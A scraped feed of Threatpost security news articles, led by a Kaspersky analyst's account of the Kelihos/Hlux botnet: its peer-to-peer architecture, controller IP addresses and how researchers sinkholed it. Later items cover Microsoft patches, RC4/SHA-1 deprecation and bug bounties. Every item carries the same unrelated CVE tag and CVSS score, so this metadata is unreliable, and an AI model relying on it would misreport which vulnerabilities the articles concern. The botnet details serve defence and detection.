This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. 
A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host an nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. The two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USER\\Software\\Google together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer sends 250 of its entries back. 
By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. 
If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated, as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for an intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also, to some extent, how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of their real controllers. 
At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. 
However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "The [RC4](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>) and SHA-1 algorithms have taken a lot of hits in recent years, with new attacks popping up on a regular basis. Many security experts and cryptographers have been recommending that vendors begin phasing the two out, and Microsoft on Tuesday said that it is now recommending to developers that they deprecate RC4 and stop using the SHA-1 hash algorithm.\n\nRC4 is among the older stream cipher suites in use today, and there have been a number of practical attacks against it, including plaintext-recovery attacks. The improvements in computing power have made many of these attacks more feasible for attackers, and so Microsoft is telling developers to drop RC4 from their applications.\n\n\u201cIn light of recent research into practical attacks on biases in the RC4 stream cipher, Microsoft is recommending that customers enable TLS1.2 in their services and take steps to retire and deprecate RC4 as used in their TLS implementations. 
Microsoft recommends TLS1.2 with AES-GCM as a more secure alternative which will provide similar performance,\u201d Microsoft\u2019s William Peteroy said in a [blog post](<https://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx?Redirected=true>).\n\n\u201cOne of the first steps in evaluating the customer impact of new security research and understanding the risks involved has to do with evaluating the state of public and customer environments. Using a sample size of five million sites, we found that 58% of sites do not use RC4, while approximately 43% do. Of the 43% that utilize RC4, only 3.9% require its use. Therefore disabling RC4 by default has the potential to decrease the use of RC4 by over almost forty percent.\u201d\n\nThe software company also is recommending that certificate authorities and others stop using the SHA-1 algorithm. Microsoft cited the existence of known collision attacks against SHA-1 as the main reason for advising against its use. Also, after January 2016, Microsoft developers can no longer use SHA-1 in code-signing or developer certificates.\n\n_Image from Flickr photos of [Josh Bancroft](<http://www.flickr.com/photos/joshb/>). _\n", "cvss3": {}, "published": "2013-11-12T16:07:39", "type": "threatpost", "title": "Microsoft Warns Customers Away From RC4, SHA-1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-14T18:14:04", "id": "THREATPOST:E7C5C8276111C637456F053327590E4C", "href": "https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. 
But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. 
And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. 
That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. 
Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:39", "description": "The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities. \n\nThree of the bulletins are rated \u201ccritical\u201d because of the risk of remote code execution attacks. Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).\n\nThis month\u2019s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.\n\nMicrosoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.\n\nHere\u2019s the skinny on these three bulletins:\n\n * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) \u2014 This security update resolves two privately reported vulnerabilities in Microsoft Windows. 
These vulnerabilities could allow remote code execution if a user opens a specially crafted media file or receives specially crafted streaming content from a Web site or any application that delivers Web content. This is rated Critical for Quartz.dll (DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; Critical for Windows Media Format Runtime on Microsoft Windows 2000, Windows XP, and Windows Server 2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2; and Important for Windows Media Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.\n * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) \u2014 This security update addresses two privately reported vulnerabilities for Microsoft software. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Vista, and Windows 7, and Moderate for all supported editions of Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code execution if a user views a specially crafted Web page that instantiates a specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.\n * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) \u2014 Fixes five privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4; Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Moderate for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers.\n\nQualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the Pwn2Own vulnerability that security researcher Peter Vreugdenhil used to win ZDI\u2019s competition at CanSecWest. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods.\n\nThe MS10-040 bulletin is also interesting. It covers a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset. 
Microsoft rates this an \u201cimportant\u201d update.\n", "cvss3": {}, "published": "2010-06-08T19:07:32", "type": "threatpost", "title": "Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:36:58", "id": "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "href": "https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "description": "Microsoft has released a public version of its internal Attack Surface Analyzer tool, which helps organizations identify changes to a system\u2019s attack surface as new applications are added. The tool has been in beta for a few months, but this is the first official release.\n\nThe Attack Surface Analyzer is part of the company\u2019s own internal software and application security efforts. It\u2019s part of Microsoft\u2019s Security Development Lifecycle, and it\u2019s meant to address the gaps in security that can arise when an organization installs new applications on a system. Even small changes on a system can lead to unanticipated consequences, including new vulnerabilities and weak spots where attackers might be able to slide in.\n\n\u201cUnlike many tools that analyze a system based on signatures or known vulnerabilities, Attack Surface Analyzer looks for classes of security weaknesses Microsoft has seen when applications are installed on the Windows operating system, and it highlights these as issues. The tool also gives an overview of changes to the system that Microsoft considers important to the security of the platform, and it highlights these changes in the attack surface report. 
Some of the checks performed by the tool include analysis of changed or newly added files, registry keys, services, Microsoft ActiveX controls, listening ports and other parameters that affect a computer\u2019s attack surface,\u201d Monty LaRue and Jimmie Lee of Microsoft said.\n\nAttack Surface Analyzer isn\u2019t just meant for security professionals or even IT staff. Microsoft says the tool also can be of use to developers who can see how the code that they\u2019re writing will affect the security of a system. That\u2019s not often something that\u2019s possible for developers during the process of writing an application.\n\nThe new version of Attack Surface Analyzer includes both a GUI and a command line interface.\n\n\u201cThe tool has a stand-alone wizard to help guide users through the scanning and analysis process; a command-line version supports automation and older versions of Windows, and assists IT professionals as they integrate the tool with existing enterprise management tools,\u201d LaRue and Lee said.\n", "cvss3": {}, "published": "2012-08-06T18:09:02", "type": "threatpost", "title": "Microsoft Releases Attack Surface Analyzer Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:45", "id": "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "href": "https://threatpost.com/microsoft-releases-attack-surface-analyzer-tool-080612/76884/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), 
released today, an elevation of privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance; for example, an attacker would need local access or legitimate credentials to exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. 
Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. \n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. 
\n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. 
It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think not only about finding and fixing one-off bugs, but also about strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contract to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. 
Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give in to the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result was a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. 
The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:21", "description": "The U.S. Navy recently hired an outside contractor, Obscure Technologies, to develop computer forensics tools capable of analyzing network traffic and stored data on gaming consoles.\n\nThe contract, valued at $177,237.50, calls on Obscure Technologies to create hardware and software tools that can be used to extract data from video game systems, compile a collection of data (disk images; flash memory dumps; configuration settings) extracted from new and used video game systems, and prepare a 10-20 page report including the following:\n\nDetailed accounts of issues involved in extracting forensic data from a series of game consoles, technical information regarding how information can be extracted from video game systems, any engineering decisions that were made and why, what work remains to be done, and any failings of the approaches followed.\n\n\u201cThis project involves furnishing video game systems, both new and used, and creating prototype rigs for capturing data from the video game systems,\u201d reads the Navy\u2019s official listing.\n\nThe project seeks to create these tools for use by the United States Department of Homeland Security Science and Technology.\n\nObscure Technologies was awarded this contract, the Navy claims, because 
they appear to be the only U.S. company in the business of purchasing used computer equipment for the purpose of accessing the data stored within. The Navy\u2019s justification and approval report also notes that Obscure Technologies\u2019 lead scientist has experience reverse engineering the Microsoft XBOX.\n\nYou can find the Navy\u2019s justification and approval document [here](<https://www.fbo.gov/index?s=opportunity&mode=form&id=fa7296a2e0980fe24aa72c919a665b44>).\n", "cvss3": {}, "published": "2012-04-09T18:33:01", "type": "threatpost", "title": "Navy Hires Contractor to Data-Mine Gaming Consoles", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:05:32", "id": "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "href": "https://threatpost.com/navy-hires-contractor-data-mine-gaming-consoles-040912/76420/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be 
